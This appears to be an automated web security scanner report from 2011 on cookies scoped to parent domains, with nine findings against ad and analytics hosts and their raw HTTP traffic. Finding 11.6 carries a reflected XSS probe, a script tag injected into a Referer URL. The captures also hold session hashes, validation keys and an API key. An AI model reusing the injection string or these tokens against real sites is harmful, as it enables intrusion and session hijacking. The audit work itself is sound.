Location: http://a7f01869e5f0330bd/a?http://pix04.revsci.net/D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D2011051519270862126421219180%2526namp%253D
Content-type: text/html
Date: Tue, 14 Jun 2011 00:14:02 GMT
Server: lighttpd/1.4.18
Content-Length: 1



11. Cookie scoped to parent domain
There are 48 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. http://a.analytics.yahoo.com/fpc.pl

Summary

Severity:   Low
Confidence:   Firm
Host:   http://a.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fpc.pl?a=10001494318262&v=5.17&enc=UTF-8&b=Downloads%20%7C%20Yahoo!%20Advertising%20Blog&f=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2Fdownloads%2F&e=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2F2011%2F05%2F31%2Fyahoo-launches-clear-ad-notice%2F&flv=Shockwave%20Flash%2010.3%20r181&d=Tue%2C%2014%20Jun%202011%2000%3A26%3A38%20GMT&n=5&g=en-US&h=Y&j=1920x1200&k=32&l=true&ittidx=0&fpc=v-Z-Or9d%7CqwoUoZiLaa%7Cfses10001494318262%3D%7CqwoUoZiLaa%7Cv-Z-Or9d%7Cfvis10001494318262%3DZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw%3D%3D%7C8MYoY8Yos7%7C8MYoY8Yos7%7C8MYoY8Yos7%7C8%7C8MYoY8Yos7%7C8MYoY8Yos7 HTTP/1.1
Host: a.analytics.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/downloads/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=; itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|M|M|M|s|8MYoY8YoMM|M; itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:27:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|7|7|7|8|8MYoY88s11|7; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=; path=/; domain=.analytics.yahoo.com
TS: 0 261 dc3_ac4
Pragma: no-cache
Expires: Tue, 14 Jun 2011 00:27:36 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Connection: close
Content-Type: application/x-javascript

// First Party Cookies
// TS: 0 261 dc3_ac4


11.2. http://a.analytics.yahoo.com/p.pl

Summary

Severity:   Low
Confidence:   Firm
Host:   http://a.analytics.yahoo.com
Path:   /p.pl

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p.pl?a=1000380893662&v=5.17&enc=UTF-8&b=Home%20page&c=yahoo!%20advertising%20solutions&f=http%3A%2F%2Fadvertising.yahoo.com%2F&x=7&cf20=EXIT&cf21=click%20Sponsored%20Search&ca=1&ix=2&ittidx=0&fpc= HTTP/1.1
Host: a.analytics.yahoo.com
Proxy-Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|8MYoY8YosM|8MYoY8YosM|8MYoY8YosM|8|8MYoY8YosM|8MYoY8YosM; itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|M|M|M|s|8MYoY8YoMM|M; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; path=/; domain=.analytics.yahoo.com
TS: 0 272 dc12_ac4
Connection: close
Pragma: no-cache
Expires: Tue, 14 Jun 2011 00:20:34 GMT
Cache-Control: no-cache, private, must-revalidate
Accept-Ranges: bytes
Tracking-Status: site tracked
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.3. http://gs.mtv.com/games/playgame.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://gs.mtv.com
Path:   /games/playgame.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /games/playgame.php?site_id=1&game_id=1390 HTTP/1.1
Host: gs.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=0

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Content-Length: 1190
Date: Tue, 14 Jun 2011 00:19:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; path=/; domain=mtv.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

11.4. http://www.forexfactory.com/excal.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /excal.php?do=fetchcss&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=407.52568085398525 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:01:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: ffsessionhash=f4bf7286639f1eb8531a1e8b00c74e68; path=/; domain=.forexfactory.com; HttpOnly
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:01:48 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:01:48 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2361
Content-Type: text/css

#_s_ff_syn {
background: transparent;
margin: 0;
padding: 0;
height: 100%;
}

#wscal_parent * { margin: 0 padding: 0;}

.bigusername { font-size: 14pt; }

.wscal_vbmenu_popup
{
   backgroun
...[SNIP]...

11.5. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=alexacom&adSpace=us&tagKey=2057624979&th=24047165603&tKey=undefined&size=160x600&flashVer=10&ver=1.20&center=1&noAd=1&url=http%3A%2F%2Fwww.alexa.com%2F&f=1&p=11240442&a=1&rnd=11248586 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1219;c=15/1;w=160;h=600;d=7;s=1;q=ALEXA_core
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=atnfruriItm63PT3eCiVPFU9J3JngpSjAbVAFjAQ74dPYSjsRwrHYvtnr4KeUB2FN0mFZam1Q4Zb5rCJ9tK3lqAbkvlpOS1Rdt7DmDyL6OUtkALmYL4Wavq3MgWc1HeOgorXrJaK5sPy8H3fG6rR2QZb73RfYD7XNfUw2v862OqaRixZb5S92TBo0ZboG8xCyE6ccrY1vMr0lZcJ7HEQqUTs7ZcGWgDTZaBv8fwLdEfO2cZa8blJZaeDCHYK1lVZc5p4aZdjZbgKkBDVSbYfiUeYvpSwrMTOZbs9Wowek8qxQSRDXPB1fo6POyHSk8EZcVlcW544LyeJJRyc7ZcwlPqgZcKVBvq5DYG37tj6JHGQIxn0qQfwbekxTZdBnNq3VQPGVtTDRPQbxuhmTir4T31S7RWZbZdB6DKqCZdjLm33R3r6FushuEK4WJu9ZdYGR2HKcGU8us7udWbaEpQSIXx2NZa

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aungjUwl6hwUQQwgQRaCFyUS7jC64OywUPxH2ILm35hSvP9FsxMpesmpvZcKIfCWWhrWEmo3P82WbGmlrZcx7bYZcZagpWnmhairy6ma7rJZb2NA6HsUJcwdNZbaPZbs2Nb2PgQrirwuO5T3mBsjwZc6n329ruwdYsDmIQ7to3tB6ZbwdyuKZdUaV6IeZa6gVVsdAjgeoEB700gMh3ZdOtZd67b0AmhcNCddDXtZaYcwYZd1e7Zb2dZdRfvDfUlFtQ823R25PKTHZabPZax2JX8F6clMqSZaORTCEDtY90WCRXbpAtNEHsrWXN8S2QpOdP6Q6Zd41WXX2R1yIrKYkpZcfxSRoho14QMZbSB36SmkGC0185hLHQsZaKwCrPRcGI54u10SehUmjwOtm54055TZdrgTkHc7m0BimPPCqGAjO55gdM06TeYZbsbZap6n1ZcNJAwGBYIhgR8oWONy4mlQZbZdoO3NBHYYQHoFrMrMTb6CZcw; path=/; domain=.tribalfusion.com; expires=Mon, 12-Sep-2011 00:28:25 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 386
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/armMfj4sQUYbQKTmPm4mZb7RP7J3dnnXWrZamdIv36YT3GMdTsJ9WVJ7P6FvWdY3WFj43ritVqUtTTQ8SaQISGQIRr6vRW7aVGfQ2FPomHqs0amM4dMBPsb
...[SNIP]...

11.6. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;241002212;63651464;o?http://us.havaianas.com/MYOH.html HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: id=c60bd0733000097|3226301/1106615/15127,3149839/1069411/15111,2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://us.havaianas.com/MYOH.html
Set-Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127,3149839/1069411/15111,2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye; path=/; domain=.doubleclick.net; expires=Fri, 08 Feb 2013 14:08:21 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 13 Jun 2011 17:45:35 GMT
Server: GFE/2.0
Content-Type: text/html


11.7. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1188614T19920110117205515&cid=1478425&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b26/3/0/*/v%3B242169367%3B0-0%3B3%3B39555935%3B3454-728/90%3B40388893/40406680/1%3Bu=!category-games|pos-atf|tag-adj|mtype-standard|sz-728x90|tile-2|demo-D|demo-T|demo-5840|demo-2966|demo-2907|demo-2905|demo-2904|demo-1607|demo-1299|demo-850|demo-848|demo-844|demo-827|demo-790|demo-777|demo-775|demo-774%3B~aopt=2/1/c6a3/0%3B~sscs=%3F$CTURL$&time=1|19:19|-5&r=0.015173257561400533&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CFJZfEo8h4CIqb!BVBBeJraEo5HX15xKAfDBCeJozEpECIv30c!BdBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAe; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B; PRimp=96A50400-1413-8C47-0309-C2F0023E0100; PRca=|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jun 2011 00:19:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 7965
Set-Cookie:PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A0A50400-79FC-2CEB-0209-123004DD0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJfR*19:2|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJfRAAAT:2|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|EzNM:2|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMb9:2|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EzNMGMb9:2|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

11.8. http://api.bizographics.com/v1/profile.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=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

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 14 Jun 2011 00:13:55 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=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;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 511
Connection: keep-alive

dj.module.ad.bio.loadBizoData({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_syst
...[SNIP]...

11.9. http://ar.voicefive.com/b/recruitBeacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p104567837&PRAd=63567820&AR_C=42361216 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
